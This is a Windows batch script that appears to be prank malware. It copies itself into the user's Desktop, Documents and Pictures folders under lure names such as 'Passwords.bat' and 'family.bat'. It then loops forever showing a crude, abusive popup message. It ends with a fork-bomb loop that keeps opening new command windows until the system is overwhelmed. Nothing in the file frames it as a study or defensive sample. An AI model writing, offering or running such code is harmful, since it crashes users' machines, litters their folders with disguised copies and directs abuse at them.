
@echo off


copy realtest.bat "C:\Users\%username%\Desktop\Passwords.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\family.bat" 
copy realtest.bat "C:\Users\%username%\Documents\Notesforlater.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Desktop\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Documents\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 
copy realtest.bat "C:\Users\%username%\Pictures\haha.bat" 


@echo off
:A
msg * lol get fucked whore 
goto:A

@echo off
:A
Start
goto:A

